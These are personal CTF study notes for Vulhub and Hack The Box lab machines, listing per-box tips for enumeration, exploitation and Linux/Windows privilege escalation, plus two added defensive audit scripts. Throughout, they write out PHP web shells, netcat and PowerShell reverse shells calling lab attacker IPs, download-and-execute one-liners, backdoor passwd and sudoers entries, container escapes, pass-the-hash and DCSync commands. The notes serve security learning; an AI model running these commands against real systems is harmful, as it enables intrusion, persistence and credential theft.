
My CTF notes-Vulhub & HTB

Please ignore any typos and grammar mistakes. These are notes from my learning and various assessments. Before I forget all of this, I thought I would share them here, as someone will find them useful. Again, note that they are not very well arranged.

Vulhub Machines

Happy corp
1. Whenever you find PHP files in the URL, try LFI with '.php?file=/etc/passwd'.
2. After that, try injecting PHP code that will run a command on the victim machine: '<?php system($_GET['cmd']); ?>'
3. To check whether it is working, append '&cmd=id' to the URL. This returns the uid, gid and group memberships.
4. Use a tool like wfuzz to fuzz the URL.
5. Look for these files when you get LFI: /etc/passwd, /etc/shadow, /var/log/nginx/access.log, /var/log/nginx/error.log
6. In Linux, /tmp is the folder where every user has read and write access.
7. A few binaries always run as root, regardless of who executes them. These are called SUID root binaries. Command to identify them:
# find / -perm /4000 2>/dev/null
8. Command to get a (TTY) shell:
# python3 -c "import pty; pty.spawn('/bin/bash')"
9. To try command injection in the username and password fields:
# http://10.0.2.11/admin.php?username=ls&password=test
10. It is always good to use a reverse shell, because it can get past firewalls.
————–
v1-inclusiveness-1
1. If the robots.txt file does not show its contents, add a custom user-agent in Firefox to bypass the restriction.
2. Follow these steps:
# In the URL bar, open "about:config"
# Search for the preference name: useragent
# Right click > New > String
# Create the preference "general.useragent.override" with the string value "googlebot"
# Reload the page
3. Commands to find programs running under the superuser (SUID):
# find / -perm -u=s -type f 2>/dev/null
# find / -perm -4000 -type f 2>/dev/null
4. Adding a directory to the PATH variable. Here we are adding the '/tmp' directory to PATH:
# export PATH=/tmp:$PATH
# echo $PATH
————–
v2-my-file-server-1
1. smbmap -H 192.168.29.123 . With this command we can identify the SMB users on that machine.
2. If we can somehow insert an SSH public key into the .ssh directory with the name 'id_rsa.pub', then we will be able to get access via SSH. Make sure that the SSH key pair is generated for a username we got through enumeration.
3. Compiling a C exploit:
# gcc evil.c -o hack -pthread
————
v3-tempus-fugit
This is a kind of machine where, inside the primary machine, other machines are running as Docker containers and the flag is inside those containers. We can identify this from the IP address in ifconfig: we will see a different range of IP addresses.
In CTF challenges always read all the text; you will get clues here and there.
1. Trying command injection at upload:
filename="test.txt;whoami"
2. When '.py' or '.php' files are not read by the server because of filtering, try wildcards. Here we are reading a 'main.py' file. Since the '.py' extension is filtered, we use the following command:
# cat main*
3. Bypassing the dot filter in IP addresses. Sometimes when we get command injection in the web application, the '.' character is filtered and we cannot make a reverse shell, because the IP address contains dots. What we do is convert the IP to its 'long IP' (decimal) form, thereby bypassing the restriction. The command then looks like this:
# nc 32893749253917 9999
4. Converting a netcat reverse shell to base64 encoding to bypass protection:
# echo bmMgLW52IDE3Mi4xNi4xODYuMSA3Nzc3IC1lIC9iaW4vc2g= | base64 -d | sh
5. Another kind of netcat shell:
# nc 34459574061 8888 -e sh
6. Converting an improper shell to a TTY shell:
# python -c 'import pty; pty.spawn("/bin/sh")'
# python -c "import pty; pty.spawn('/bin/bash')"
# python -c 'import pty;pty.spawn("/bin/bash")'
7. Another kind of FTP client: ncftp, an alternative FTP client developed during the 1990s.
8. To identify whether we are inside a Docker environment, just read the proc cgroup file:
# cat /proc/1/cgroup
9. Port scanning with netcat:
# nc -zv 192.168.10.11 21
10. lftp: another FTP client, also called the Swiss army knife of file transfer protocols.
11. Always look into hidden files (names starting with '.') and also history files, e.g. files with a '.history' extension.
12. Finding the flavour of Linux:
# cat /etc/os-release
https://www.cyberciti.biz/faq/how-to-check-os-version-in-linux-command-line/
13. Finding the Linux kernel version:
# uname -r
14. Adding tools in Alpine Linux:
# apk add nmap
15. An msfvenom payload for Alpine Linux should be in 'payload.elf' format.
16. Port forwarding using meterpreter:
# portfwd add -l 8080 -p 8080 -r 172.19.0.1
17. Routing the victim's internal network traffic without using meterpreter:
# ip route add 172.19.0.0/24 via 172.16.186.196
18. Sometimes services running inside Docker are not accessible to the external attacker. In that case we have to use port forwarding, so that the service is forwarded to the attacker machine and we can see it.
19. Finding the DNS resolver configuration of a machine:
# cat /etc/resolv.conf
# cat /etc/hosts
20. bind-tools: a set of tools used for checking the DNS implementation.
# apk add bind-tools
21. If we are inside a private network and were able to identify the DNS server, then we can try a DNS zone transfer:
# dig axfr mofo.pwn
22. Finding listening processes using netstat:
# netstat -ntlp
23. Grabbing credentials from the network:
# responder -I eth0
A better tool than Wireshark for this.
24. To log in as another user:
# su kamal
25. Checking whether a user can run some applications with root privileges. This will work only if we know the password of the account we are logged in as; otherwise use the other commands above.
# sudo -l
————
View2aKill

1. Always scan all the ports.
2. Always try reading the files inside the directories we get.
3. Look for a Python one-liner reverse shell.
4. Kali has web shells located at /usr/share/webshells.
5. Website to convert strings to SHA1 hashes: http://www.sha1-online.com/
6. This writeup also contains a Python script to convert strings to SHA1 hashes using the Python library 'hashlib'.
————
mattermost

1. Always read README.md files.
2. Always check for UDP ports as well.
3. Opening a web server with PHP:
# php -S 0.0.0.0:8080
4. Converting a 'hex' value to a decimal string:
# echo $((0xf447))
————-
connect-the-dots
1. Always read the source code of the website.
2. Listing an NFS share:
# showmount -e 10.0.2.17
3. In most cases privilege escalation is done by looking for weak service configuration such as sudo and SUID permissions, or file capabilities. Use the following command:
# /sbin/getcap -r / 2>/dev/null
4. Usually programs with the "+ep" capability flag have the provision to get root privileges. In our case the 'tar' program has this permission and we are exploiting it.
5. Binary files cannot be read with the 'cat' or 'nano' commands. To read those files we can use the 'strings' command, which pulls out the human-readable contents of a binary file.
————-
cyNix
1. If there is a website and no other clue, even without any other port open, then there is a chance of getting a clue from the source code, or, if there is a form, some info from that. In these cases you will most often get LFI or command execution in form fields.
2. In such cases check the 'opacity' value. The opacity level describes the transparency level, where 1 is not transparent at all, 0.5 is 50% see-through and 0 is completely transparent. Sometimes clues are hidden using the opacity feature.
3. In the '/etc/passwd' file check for user IDs with '1000:1000'.
4. If there is LFI in the website and SSH is open on the same host, then there is a chance of getting the SSH key from "/home/user/.ssh/id_rsa". With this key one can log in to the host.
5. This kind of key should be given '600' permissions in order to use it:
# ssh -i key user@10.0.2.1
6. Whenever you get a shell, always check which groups you are in using the commands below:
# groups
# id
- People with root-level access are put into a group and given sudo permission. This is how the sudo command comes into play.
----Exploitation when you are in the LXD group----
1. LXD is a process that runs on a machine when it has a container or virtualization technology running on Linux.
2. LXD processes always run as root, and so can anyone with write access to the LXD UNIX socket.
3. So the concept behind this attack is that the attacker builds an image on the attacker machine, transfers the image to the victim machine and runs it there. On running the image we get the privilege to run shell commands on the victim machine.
4. When doing privilege escalation, always dump your binaries or whatever executables into the '/tmp' directory of the Linux machine.
At attacker machine:
# git clone https://github.com/saghul/lxd-alpine-builder.git
# cd lxd-alpine-builder
# ./build-alpine

At victim machine:
# cd /tmp
# wget http://192.168.1.107:8000/alpine-v3.10-x86_64-20191008_1227.tar.gz
# lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
# lxc image list
# lxc init myimage ignite -c security.privileged=true
# lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
# lxc start ignite
# lxc exec ignite /bin/sh
# id

Once the container is up and running, navigate to the following folder to see all the host's resources:
# cd /mnt/root/root
————
v7-DC-9
1. In a PHP website, if you get "file does not exist", that means the PHP code uses the "include()" function, and "include" calls are vulnerable to LFI.
2. ../../../../../proc/sched_debug: this will list the current processes on the host machine.
3. Port knocking: port knocking is a method used to secure port access from unauthorised users. It allows you to keep your services hidden until you actually plan on using them. Once a correct sequence of connection attempts is received, the firewall opens the port that was previously closed.
4. If you find a firewall with a filtered port, always check for the 'knockd.conf' file. Then use the correct sequence given in the knockd file.
# apt-get install knockd
# knock 10.0.2.19 7469 8475 9842
Knocking using nmap:
# nmap -Pn --host-timeout 201 --max-retries 0 -p 571,290,911 10.10.10.43
# ls -lart
5. This will open up the SSH port only. Usually in this kind of knocking case, the SSH public and private keys will be found somewhere by enumerating the target, mostly in secret folders or pictures.
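A defender-side view of the same mechanism, as an added example (not from the notes): a small knockd-style state machine replayed over constructed iptables LOG lines, using the three-port sequence from the knock command above. It reports which sources completed the sequence in order and which fumbled it; the fumbles are the signal that someone is probing the knock ports. The sequence, timeout and log lines are all assumptions made for this example.

```python
import re
from collections import defaultdict

# Sequence and timeout are assumptions for this example: the three ports come
# from the knock command in the notes; 5 s mirrors a typical knockd seq_timeout.
KNOCK_SEQUENCE = (7469, 8475, 9842)
SEQ_TIMEOUT = 5

# Constructed iptables LOG lines (not captured from a real host): the first
# source knocks correctly, the second hits the knock ports out of order.
SAMPLE_LOG = """\
Oct  5 10:00:01 dc9 kernel: [KNOCK] IN=eth0 SRC=10.0.2.15 DST=10.0.2.19 PROTO=TCP SPT=40001 DPT=7469 SYN
Oct  5 10:00:01 dc9 kernel: [KNOCK] IN=eth0 SRC=10.0.2.15 DST=10.0.2.19 PROTO=TCP SPT=40002 DPT=8475 SYN
Oct  5 10:00:02 dc9 kernel: [KNOCK] IN=eth0 SRC=10.0.2.15 DST=10.0.2.19 PROTO=TCP SPT=40003 DPT=9842 SYN
Oct  5 10:00:05 dc9 kernel: [KNOCK] IN=eth0 SRC=10.0.2.99 DST=10.0.2.19 PROTO=TCP SPT=50001 DPT=7469 SYN
Oct  5 10:00:06 dc9 kernel: [KNOCK] IN=eth0 SRC=10.0.2.99 DST=10.0.2.19 PROTO=TCP SPT=50002 DPT=9842 SYN
Oct  5 10:00:30 dc9 kernel: [KNOCK] IN=eth0 SRC=10.0.2.99 DST=10.0.2.19 PROTO=TCP SPT=50003 DPT=8475 SYN
Oct  5 10:00:31 dc9 kernel: [KNOCK] IN=eth0 SRC=10.0.2.99 DST=10.0.2.19 PROTO=TCP SPT=50004 DPT=22 SYN
"""

LINE_RE = re.compile(
    r"^\w{3}\s+\d+\s+(?P<time>\d\d:\d\d:\d\d)\s.*?\bSRC=(?P<src>[\d.]+)\b.*?\bDPT=(?P<dport>\d+)\b"
)


def _seconds(hhmmss):
    """Time of day in seconds; good enough for a same-day log window."""
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return h * 3600 + m * 60 + s


def track_knocks(log_text, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT):
    """Replay LOG lines through a knockd-style state machine kept per source IP.

    Returns (completed, failed): completed is a list of (src, time) for sources
    that hit the whole sequence in order within `timeout` seconds; failed maps
    src -> number of out-of-order or expired attempts, which is what a defender
    wants to alert on, since a legitimate client rarely fumbles its own knock.
    """
    progress = {}            # src -> (index of next expected port, time of first knock)
    completed = []
    failed = defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        src, port, now = m["src"], int(m["dport"]), _seconds(m["time"])
        if port not in sequence:
            continue             # knockd only listens on the configured ports
        idx, started = progress.get(src, (0, now))
        if idx > 0 and now - started > timeout:
            failed[src] += 1     # sequence took too long: start over
            idx = 0
        if port == sequence[idx]:
            if idx == 0:
                started = now
            idx += 1
        else:
            failed[src] += 1     # wrong port for this position
            idx, started = (1, now) if port == sequence[0] else (0, now)
        if idx == len(sequence):
            completed.append((src, m["time"]))
            progress.pop(src, None)
        else:
            progress[src] = (idx, started)
    return completed, dict(failed)


def report(log_text=SAMPLE_LOG):
    """Convenience wrapper used by the __main__ block and the checks."""
    return track_knocks(log_text)


if __name__ == "__main__":
    done, bad = report()
    for src, when in done:
        print(f"{when} {src}: full knock sequence, port would be opened for this source")
    for src, n in bad.items():
        print(f"{src}: {n} failed knock attempts (possible probing of the knock ports)")
```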
6. The command below lists the commands the sudo user has access to:
# sudo -l
7. To see the properties of a file:
# ls -lart /etc/bin/attack.py
# file attack.py
8. In order to get root access, there is a method of pushing a username and password hash into the /etc/passwd file. For that we first need to create the hashed password using the 'crypt' function. This can be done using 'perl' or using openssl.
# perl -le 'print crypt("password", "kamal")'
# openssl passwd -1 -salt kamal password
# echo "kamal:aaKNIED0aueR6:0:0::/root:/bin/bash" >> /etc/passwd
9. Thus the entry is pushed into the '/etc/passwd' file and we get root access.
———–
V8-symfonos
1. In PHP sites always check the parameters for LFI.
2. If you have got an LDAP username and password, there is an nmap script to scan for additional information:
# nmap 192.168.0.112 -p 389 --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local", ldap.password="qMDdyZh3cT6eeAWD"'
3. Privilege escalation using dpkg.
4. The secret behind this privilege escalation lies in the concept of "finding improper sudo permissions".
- Command to check which commands the logged-in user can run as the superuser:
# sudo -l
- In this machine's case the admin has allowed the user to run the dpkg command as root.
- So what the user does is create a '.deb' package with malicious code inside and install it with dpkg.
- Here a Linux packaging tool named fpm is used.
# nano shell.sh --> /bin/bash
# fpm -s dir -t deb -n exploit --before-install shell.sh ./
- Now transfer it to the target and install it:
# sudo -u root /usr/bin/dpkg -i exploit_1.0_amd64.deb
5. Decoding Base64 with echo:
# echo Y2V0a0tmNHdDdUhDOUZFVA== | base64 -d
———–
v9-sunrise
1. In the '/etc/passwd' file, if there are names with '1000:1000', then it is a user. In this case they are 'sunrise' and 'weborf'.
2. So there will always be two directories on the machine with these two names, and they might have secret files in them. They are always found in the '/home' directory:
# /home/sunrise or /home/weborf
3. Searching for a vulnerability using 'searchsploit':
# searchsploit weborf 0.1.2
# searchsploit -m 14925
4. MySQL commands:
# show databases;
# use mysql; ----> show tables; ----> describe user; ----> select user,password from user;
———–
v10-Sar walkthrough
1. Always check the 'robots.txt' file for hidden directories.
2. When there is code execution in the URL, make use of the Metasploit "web delivery" exploit.
3. curl command to send a shell into a web server and execute it:
# curl http://192.168.86.99/shell.txt --output shell.php
- Here 'shell.txt' contains the PHP code, and using the '--output' parameter it is saved on the web server as 'shell.php'.
4. Using the echo command to add a normal user to the 'sudoers' file:
# echo "www-data ALL= (root) NOPASSWD: /usr/bin/sudo " >> /etc/sudoers
5. If you don't have the privilege to run 'wget' or other commands in the normal directories, try running them in the '/tmp' directory. '/tmp' usually has the permissions needed to run such commands.
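The two persistence tricks above (the extra UID 0 entry in /etc/passwd from the DC-9 notes and the NOPASSWD sudoers line from this box) leave artefacts a defender can audit for. As an added example, not from the notes, here is a small audit that parses both files and flags those exact patterns; the sample file contents and the list of shell-escape binaries are constructed assumptions for this example.

```python
import re

# Constructed sample files (not taken from any real host). The last passwd line
# is the backdoor entry from the DC-9 notes and the last sudoers line is the one
# appended in the Sar notes; the other lines are ordinary Debian-style entries.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
love:x:1000:1000:love,,,:/home/love:/bin/bash
kamal:aaKNIED0aueR6:0:0::/root:/bin/bash
"""

SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
love ALL=(ALL) NOPASSWD: /usr/bin/dpkg
www-data ALL= (root) NOPASSWD: /usr/bin/sudo
"""

# Binaries that hand out a root shell once they run under sudo; the set is an
# assumption for this example, seeded with the ones these notes abuse.
SHELL_ESCAPES = {
    "/usr/bin/sudo", "/usr/bin/su", "/bin/sh", "/bin/bash", "/usr/bin/dpkg",
    "/usr/bin/make", "/usr/bin/find", "/usr/bin/docker", "/usr/bin/lxc", "/bin/tar",
}

# user-or-group  hosts = (runas) TAG: command[, command...]
SUDO_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def audit_passwd(text):
    """Return (user, reason) findings for the content of /etc/passwd."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((user, "UID 0 account other than root"))
        if pw == "":
            findings.append((user, "empty password field (no password needed)"))
        elif pw not in ("x", "*", "!"):
            findings.append((user, "password hash stored in /etc/passwd, not /etc/shadow"))
    return findings


def audit_sudoers(text):
    """Return (who, command, reason) findings for sudoers content."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SUDO_RE.match(line)
        if not m or m["who"] == "root":
            continue
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            prog = cmd.split()[0] if cmd else ""
            reasons = []
            if nopasswd:
                reasons.append("NOPASSWD")
            if prog in SHELL_ESCAPES:
                reasons.append("known shell-escape binary")
            if reasons:
                findings.append((m["who"], prog, ", ".join(reasons)))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print("passwd :", *f)
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("sudoers:", *f)
```

On a live host, feed the functions the contents of /etc/passwd and /etc/sudoers (plus /etc/sudoers.d/*) instead of the samples.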
————
v11- Five86-1
1. When exploit modules downloaded from exploit-db are Metasploit modules, i.e. '.rb' files, they should be copied into the following directory:
# /exploit
2. Creating 10-letter passwords from a limited character set using crunch. Here 'abcdefg' is the character set:
# crunch 10 10 abcdefg > dict.txt
3. Using John to crack a hash:
# john --wordlist=/root/dict.txt hash
4. Authorized keys are by default configured in .ssh/authorized_keys in the user's home directory.
5. Basic tutorial on creating SSH public and private keys: https://www.digitalocean.com/community/tutorials/how-to-configure-ssh-key-based-authentication-on-a-linux-server
6. Checking for files with the SUID permission bit set:
# find / -perm -u=s -type f 2>/dev/null
# find / -perm -4000 -type f
7. Searching for files with a specific name owned by a user:
# find / -name '*mail*' -user jen
————
v12- Sunset
1. If we are able to get SQL injection, then we can write malicious PHP code into any directory inside the web server we like:
# mysql> select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/raj.php';
Using SQL for code execution: https://www.mrjamiebowman.com/hacking/command-line-mysql-for-hackers/
2. URL to execute the command:
# http://192.168.1.167:8080/raj.php?cmd=payload
3. Generating web delivery PHP shell code:
msfconsole
> use exploit/multi/script/web_delivery
> set target 1 (for PHP reverse shell)
> set payload php/meterpreter/reverse_tcp
> set lhost eth0 (for the ethernet card)
> set lport 1122
> run
4. Making use of the 'make' command for privilege escalation:
# COMMAND='/bin/sh'
# sudo make -s --eval=$'x:\n\t-'"$COMMAND"
- https://gtfobins.github.io/gtfobins/make/
5. Making use of Docker to start a container and thereafter gain a root shell:
# docker run -it -v /root:/root ubuntu
# docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
# docker run -v /:/mnt --rm -it alpine chroot /mnt sh
————
v-13-sunset:nightfall
1. Method of accessing a machine by generating an SSH public and private key. Usually SSH keys are generated using ssh-keygen and copied into the '.ssh' directory of the respective machine.
2. 'id_rsa.pub' is put on the victim machine and we use our private key 'id_rsa' to SSH into the victim machine.
3. There it is added to 'authorized_keys':
# cat ~/.ssh/id_rsa.pub > authorized_keys
or
# cp id_rsa.pub authorized_keys
4. Thereafter SSH into the victim machine:
# ssh kamal@10.0.2.17 -i id_rsa
5. Command execution using the find command:
# ./find . -exec /bin/sh -p \; -quit
6. Finding binaries with sudo permissions using 'linux smart enumeration':
# https://github.com/diego-treitos/linux-smart-enumeration
————
v-14 dawn
1. When SMB ports are open, use 'enum4linux' to enumerate.
2. Connecting to an SMB share:
# smbclient //192.168.1.165/ITDEPT
3. Putting a file into the SMB share:
# put test.txt
4. netcat command to serve a shell by opening a port on the machine:
# nc -e /bin/bash -lvp 1235 &
5. In some cases you will get root permission even without being the root user. In that case change directory to /root and you will find the flag.

~~~~~~~~~Windows Machines~~~~~~~~~~~~~~~~~~~~~~~~~
General Tips—————————————–
1. If there are no hotfixes, then the system is likely vulnerable to a kernel exploit.
2. Use rlwrap to improve the Windows shell:
# rlwrap nc -lnvp 443
3. Check whether you have write access to a folder by creating a text document in it:
# echo test > test.txt

Blue————————————————————-
1. Adding a new user from the command line if we get an admin-level shell:
# net user hacker hacker /add
2. Adding the above user to the administrators group:
# net localgroup administrators hacker /add
3. To enable RDP, add the following registry key:
# reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# For getting a reverse shell on a Windows server we must make reverse shells in aspx or jsp format.

Devel————————————————————————-
1. Starting an SMB server for file transfer using "smbserver.py" from the Impacket module. Here 'root' is the name of the directory shared. This is done on the Kali side:
# smbserver.py share root
# smbserver.py kali .
2. At the other end, on the Windows command line, the following command is used to download the file:
# copy \\10.10.10.14\kali\myshell.exe .
or
# copy \\10.10.10.14\kali\myshell.exe exploit.exe
3. Using the Windows share functionality to run an exe file directly from the command line:
# \\10.10.14.34\share\nc.exe -e cmd.exe 10.10.14.34 443
Here \\10.10.14.34\share\nc.exe is the file we hosted using smbserver.py; it will use cmd to make a connection to our Kali machine (10.10.14.34) listening on 443.
4. Once you get the initial shell, use the following commands to check for different options: systeminfo, net users, hostname and hotfixes.
5. In 'systeminfo' check for three things: OS version, system type and processor type. Depending on the system type (32- or 64-bit) we need to build the exploit.
6. Checking for the .NET version installed:
# reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
# \windows\microsoft.net\framework\v2.0.50727\msbuild -version
7. Checking for privilege escalation: like LinEnum.sh on Linux, Watson is a script that checks for privesc vectors on Windows.
8. PowerShell one-liner to download a file and execute it:
# powershell iex(new-object net.webclient).downloadString('http://10.10.10.1:8000/exploit.ps1')
PowerShell one-liner to download a file:
# powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
9. Compiling a kernel exploit:
# i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
10. Downloading files using PowerShell, three methods:
- powershell -ExecutionPolicy Bypass -File wget.ps1 http://10.10.14.6:9000/priv.exe priv.exe
- powershell wget "http://10.10.14.27//sherlock/Sherlock.ps1"
- powershell wget "http://10.10.14.27/41020.exe" -outfile "exploit.exe"
11. Windows Exploit Suggester (WES) usage:
- First update WES. This creates an Excel spreadsheet from the Microsoft vulnerability database in the working directory.
- Second, retrieve the system information from the target machine. This can be done using the "systeminfo" command.
- Third, copy the output and save it in a text file "sysinfo.txt" in the Windows Exploit Suggester directory on the attack machine.
- The final command looks like this:
# ./windows-exploit-suggester.py --database 2019-10-05-mssb.xls --systeminfo sysinfo.txt

Bastard————————————————————————
1. Drupal CMS scanner:
# droopescan scan drupal -u http://10.10.10.9
2. Directory searching using dirsearch:
# dirsearch.py -u http://10.10.10.9/ -e php -x 403,404 -t 50
3. Getting shell execution on victim machines using three methods:
- using PowerShell
- using smbserver
- using certutil
4. Using netcat to get a shell via the browser:
# \\10.10.14.14\share\nc64.exe%20-e%20cmd.exe%2010.10.14.14%20443
5. Checking the architecture of a system from the command line:
# wmic os get OSarchitecture
6. Downloading files on Windows using 'certutil.exe':
# certutil.exe -urlcache -split -f http://10.10.10.9/exploit.exe C:\temp\evil.exe

Granny———————————————————-
1. Exploiting the PUT method:
https://medium.com/@asfiyashaikh10/exploiting-put-method-d2d0cd7ba662
Multiple Ways to Exploiting PUT Method:
https://www.arridae.com/blogs/HTTP-PUT-method.php
2. Checking for HTTP method vulnerabilities:
# davtest --url http://10.10.10.15
3. Adding a user to the administrative group:
# net user test test /add && net localgroup Administrators test /add
4. Checking the properties of the newly created user:
# net user test
5. Switching to a new user:
# runas kamal
6. cadaver can also be used to check for HTTP method vulnerabilities.
7. Check the 'SeImpersonatePrivilege' status using the command below. Having it enabled opens the way to a vulnerability called "token hijacking".
# whoami /priv

Arctic————————————————————————–
1. searchsploit command to check for the EDB database id:
# searchsploit --id adobe coldfusion
2. Making a JSP reverse shell for Windows platforms:
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 > shell.jsp
3. Command to use instead of 'type' on Windows:
# more user.txt

Grandpa————————————————————
1. Check the permissions of a folder. If the result shows 'WD' (write data), then we can download files into this directory:
# icacls temp
2. Check the privileges of the current shell:
# whoami /priv
3. In Metasploit use "local exploit suggester" to check for privesc using Metasploit modules.
4. Adding a line to the end of a file. For the PowerShell Nishang script, we need to add a line at the end of the file that specifies the reverse-shell connection address:
# Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 6666
# tail -1 Invoke-PowerShellTcp.ps1
5. Looking for specific information in systeminfo:
# systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Silo————————————————————–
This box mainly deals with exploitation of the Oracle database and uses a specific tool called the Oracle Database Attacking Tool (ODAT).
1. First download the ODAT binary from GitHub.
2. Attacking an Oracle DBMS starts by enumerating the Oracle System ID (SID) and thereafter brute-forcing the credentials associated with each SID.
3. Both of these can be done with Metasploit modules or the ODAT tool:
# odat_x64 sidguesser -s 10.10.10.82 -p 1521
# odat_x64 passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/oracle_default_userpass.txt
4. In the exploitation phase we upload a reverse shell with ODAT:
# odat utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe ../../shell.exe --sysdba
5. ODAT has a lot of modules for the attack. 'utlfile' helps to upload a file; similarly, the 'externaltable' module helps to execute the uploaded file through the database:
# odat externaltable -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --exec /temp shell.exe --sysdba
6. Usually the database service runs with SYSTEM privileges.
7. Tool for dumping passwords from memory:
# volatility
https://0xdf.gitlab.io/2018/08/04/htb-silo.html
8. Pass the hash using psexec:
# psexec.py -hashes aad3b435b51404eeaad3b43 -target-ip 10.10.10.82 administrator@10.10.10.82
9. Check the running processes and their privileges:
# tasklist /v
10. If "SeImpersonatePrivilege is Enabled", then we can use the 'rotten potato' exploit.
# https://areyou1or0.blogspot.com/2019/06/rotten-potato-privilege-escalation-by.html

Bounty————————————————————-
1. Making a PowerShell reverse shell using msfvenom:
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=445 -f psh -o www/met-445.ps1
2. ASP reverse-shell code:
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
3. RCE by uploading a web.config file on Windows Server:
# https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/
4. When doing Windows exploitation, after getting the initial shell always check the privileges of the current user with the following command:
# whoami /priv
5. Reading hidden directories and files:
# dir /a:hd C:\folder\

conceal———————————————————
1. Always download your privesc executable to your user's download directory, i.e.
2. If port 500 is open, a secure VPN tunnel is available; it is used by IKE.
3. Port 161 is used by SNMP, so query it with snmpwalk using the default "public" community string:
# snmpwalk -c public -v 1 10.10.10.116
# snmpwalk -v 2c -c public 10.10.10.116
4. When connecting using IPsec, it requires changes in two of its configuration files: /etc/ipsec.secrets & /etc/ipsec.conf
5. Always make sure to run both a SYN scan and a TCP connect scan. Both can give fruitful results.
6. If port 500 is open, or if any service shows up as an IKE service, then we can use the tool below to learn more about the IKE service:
# ike-scan 10.01.0.12
7. To establish an IPsec connection, strongSwan can be used:
# ipsec start
# ipsec up conceal
8. An ASP reverse shell can be found in the HTB writeup.
9. Creating a bat file from the command line (cmd.exe):
# echo powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell-2.ps1') > shell.bat
10. Bat reverse shell using netcat:
# echo C:\nc.exe -e cmd.exe 10.10.xx.xx 1340 > rev.bat
11. Juicy Potato command format:
https://github.com/ohpe/juicy-potato/releases
# juicypotato.exe -p rev.bat -l 9999 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
12. To get a CLSID use this script:
https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1

Chatterbox————————————————————
1. Checking for privilege escalation:
- Windows Exploit Suggester
- Watson
- PowerShell PowerUp.ps1
- winPEAS.exe
2. Extracting autologon credentials from the Winlogon registry key:
# (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
Alfred
# (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
Welcome1!
3. Dealing with immediate session death or timeouts:
# cat automigrate.rc
# msf exploit(multi/handler) > set AutoRunScript multi_console_command -r /root/automigrate.rc
4. Examining the file with the icacls permission utility:
# icacls root.txt
5. The dir command's /q switch shows ownership information ("q" for "ownership"... makes sense, no?) about every file and directory in the listing:
# dir /q /a:
6. Using icacls with the /grant switch to give my account full access to the file:
# icacls root.txt /grant alfred:(F)

Forest————————————————-
1. If Kerberos and LDAP services are running, then it is a Windows server machine.
2. LDAP can be queried through SMB tools.
3. The WSMan and WinRM services are open. If we find credentials through SMB or LDAP, we can use these services to remotely connect to the box.
4. LDAP enumeration can be done through the nmap 'ldap-search.nse' script.
5. enum4linux can be used to query LDAP information as well.
6. If Kerberos pre-authentication is disabled on any user account, then we can use Kerberoasting to get the user hashes, and then use another attack method called pass the hash to log in to the device.
7. Exploiting the WinRM service to log in to a machine:
# evil-winrm -i 10.10.10.161 -u svc-alfresco -p 's3rvice'
8. If the machines we are exploiting are Windows server machines, then it is wise to use BloodHound for better enumeration.
9. Creating a user on a domain:
# net user rana password /add /domain
10. Adding a user to a particular group:
# net group "group name" rana /add
11. Giving the user DCSync privileges. This is done using the PowerView.ps1 script by adding a line to it:
# Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity rana -Rights DCSync
12. Use the Impacket secretsdump script to dump the password hashes of all the users on the domain:
# impacket-secretsdump htb.local/rana:password@10.10.10.161
